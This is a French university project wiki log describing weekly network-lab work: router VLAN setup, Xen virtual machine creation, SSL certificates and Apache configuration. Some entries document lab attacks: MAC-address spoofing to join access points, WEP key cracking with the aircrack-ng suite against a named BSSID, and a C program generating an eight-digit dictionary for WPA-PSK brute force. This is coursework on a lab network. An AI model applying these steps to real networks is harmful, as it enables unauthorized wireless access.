Cahier groupe n°2

De Wiki de Projets IMA
Révision datée du 25 novembre 2015 à 10:56 par Etissot (discussion | contributions) (Semaine 7 (26/11/2015))

Cahier des charges de la tâche particulière

Présentation de la tâche particulière

La tâche particulière que nous devons effectuer lors de ce projet est la configuration d'un des deux routeurs nécessaires à l'établissement d'un réseau redondant.

Matériel utilisé pour la tâche particulière

- Routeur 3560E

Suivi de l'avancement du TP

Semaine 1 (01/10/2015)

En collaboration avec le groupe n°1 :

- Établissement d'un tableau regroupant les informations nécessaires au routage.

- Attribution des adresses IPv4 pour chaque VLAN, l'interconnexion des réseaux ainsi que les machines virtuelles.

Semaine 2 (08/10/2015)

Configuration du routeur de la salle E304 en IPv4 :

  • Configuration des VLAN :

- VLAN 11 à 20 pour chaque binôme IMA5 SC.

- VLAN 110 pour les machines virtuelles des binômes.

- VLAN 130 pour l'interconnexion avec le routeur de l'école.

  • Configuration entre le routeur et le commutateur de la salle E304.
  • Configuration avec le commutateur de la salle E306.
  • Configuration avec le routeur de l'école.
  • Réalisation de la redondance entre les deux routeurs en IPv4.

Semaine 3 (15/10/2015)

  • Configuration du routeur de la salle E304 en IPv6.
  • Réalisation de la redondance entre les deux routeurs en IPv6.
  • Nous avons choisi le nom de domaine : tissothage.lol
  • Nous avons créé notre machine virtuelle sur le dom0 cordouan.insecserv.deule.net :
ssh root@cordouan.insecserv.deule.net
xen-create-image --hostname=PANACHE --dist=jessie --dir=/usr/local/xen --gateway=193.48.57.174 --ip=193.48.57.162
tail -f /var/log/xen-tools/PANACHE.log
  • Modification du fichier de configuration : PANACHE.cfg (ajout du bridge=IMA5sc et taille mémoire à 512)
  • Suite aux modifications :
xl create /etc/xen/PANACHE.cfg
  • Lancement de la machine virtuelle :
xl console PANACHE
  • Installation des paquets suivants sur la machine virtuelle : ssh, apache2, bind9

Semaine 4 (22/10/2015)

  • Création du certificat SSL
openssl req -new -newkey rsa:2048 -sha256 -nodes -out tissothage.lol.csr -keyout tissothage.lol.key -subj '/C=FR/CN=tissothage.lol'
  • Intrusion par changement d'adresse MAC : configuration de la connexion sans fil "baguette" de notre eeePC pour la salle E304 (en donnant notre adresse MAC).
# dans le fichier /etc/network/interfaces
auto wlan0 inet static
wireless-essid baguette
address 172.26.79.59
netmask 255.255.240.0
gateway 172.26.79.254
# dans le fichier /etc/resolv.conf
nameserver 193.48.57.48
  • Nous avons réussi à se connecter sur le site de TF1 (site en ipv4).
  • Pour pouvoir se connecter au réseau wifi "troubadour" de la salle E306 :

Nous avons changé l'adresse MAC du wlan0 par une reconnue par la borne wifi.

ifconfig wlan0 hw ether ADRESSE_MAC

Pour réinitialiser la configuration

/etc/init.d/networking restart

Nous avons modifié le fichier /etc/network/interfaces pour changer le nom "baguette" en "troubadour"

  • Nous avons réussi à se connecter sur le site de TF1 (site en ipv4).

Semaine 5 (12/11/2015)

  • Cassage de clef WEP d'un point d'accès Wifi

- Activation du mode monitor de la carte réseau :

airmon-ng start wlan0

- Pour voir tous les points d'accès :

airodump-ng wlan0

- Pour voir seulement les points d'accès sur le canal 7 (canal regroupant les points d'accès "cracotte") :

airodump-ng -w out -c 7 --bssid 00:23:5E:1E:05:41 wlan0

L'adresse MAC du bssid est celle du point d'accès "cracotte2". - Enfin, pour trouver la clé, on lance :

aircrack-ng out-02.cap
  • Pour le routeur de la salle E304 : nous avons rajouté le vlan1 qui correspond au réseau privé et qui a pour adresse MAC 10.10.10.253.


Semaine 6 (19/11/2015)

  • Création des partitions LVM :
lvcreate -L 10G -n /dev/virtual/ima5-panache-home -v
lvcreate -L 10G -n /dev/virtual/ima5-panache-var -v

Puis on modifie le fichier /etc/xen/PANACHE.cfg afin d'y rajouter les partitions nouvellement créées :

disk = [
         'phy:/dev/virtual/ima5-panache-var,xvdb,w'
         'phy:/dev/virtual/ima5-panache-home,xvdb,w'
       ]

Ensuite, on configure Apache afin d'écouter sur le port 443 :

<IfModule mod_ssl.c>
   Listen 443
   NameVirtualHost 193.48.57.162:443
</IfModule>

Enfin, on ajoute un VirtualHost /etc/apache2/sites-available/000-tissothage.lol-ssl.conf :

<VirtualHost *:443>
 ServerName www.tissothage.lol
 ServerAlias tissothage.lol
 DocumentRoot /var/www/www.tissothage.lol/
 CustomLog /var/log/apache2/secure_access.log combined
 SSLEngine on
 SSLCertificateFile /etc/ssl/certs/www.tissothage.lol.crt
 SSLCertificateKeyFile /etc/ssl/private/www.tissothage.lol.key
 SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem
 SSLVerifyClient None
</VirtualHost>

Malheureusement, nous nous sommes rendues compte que suite à une erreur de notre part (noms de domaine et de certificat différents), il était évident que ça ne fonctionnerait pas.

  • Cassage de mot de passe WPA-PSK par force brute

Nous avons commencé par créer un dictionnaire qui est composé de tous les nombres à 8 chiffres. Voici le code en c qui permet de générer ce fichier :

#include<stdio.h>
#include<stdlib.h>
#define MAX_I 99999999
int main(){
        int i=0;
        FILE* fp = fopen("Dictionnaire.txt","w");
        if( fp == NULL ) printf("ERROR\n");
        else{
                for(i=0 ; i <= MAX_I ; i++){
                        fprintf(fp,"%08d\n",i);
                }
        }
        fclose(fp);
        return 0;
}


Semaine 7 (26/11/2015)

  • Rachat d'un nom de domaine "panache.lol" et installation du certificat ssl :
openssl req -nodes -newkey rsa:2048 -sha256 -keyout panache.lol.key -out panache.lol.csr

Après récupération des fichiers .key et .csr, on fournit ce dernier à Gandi et on obtient le fichier .crt.

On place www.panache.lol.key dans /etc/ssl/private et www.panache.lol.crt dans /etc/ssl/certs.

Ensuite, on récupère le certificat intermédiaire que l'on place dans le fichier /etc/ssl/certs/GandiStandardSSLCA2.pem.

Puis, on ajoute le Virtual Host dans le fichier /etc/apache2/sites-available/000-panache.lol-ssl.conf :

<VirtualHost *:443>
 ServerName www.panache.lol
 ServerAlias panache.lol
 DocumentRoot /var/www/www.panache.lol/
 CustomLog /var/log/apache2/secure_access.log combined
 SSLEngine on
 SSLCertificateFile /etc/ssl/certs/www.panache.lol.crt
 SSLCertificateKeyFile /etc/ssl/private/www.panache.lol.key
 SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem
 SSLVerifyClient None
</VirtualHost>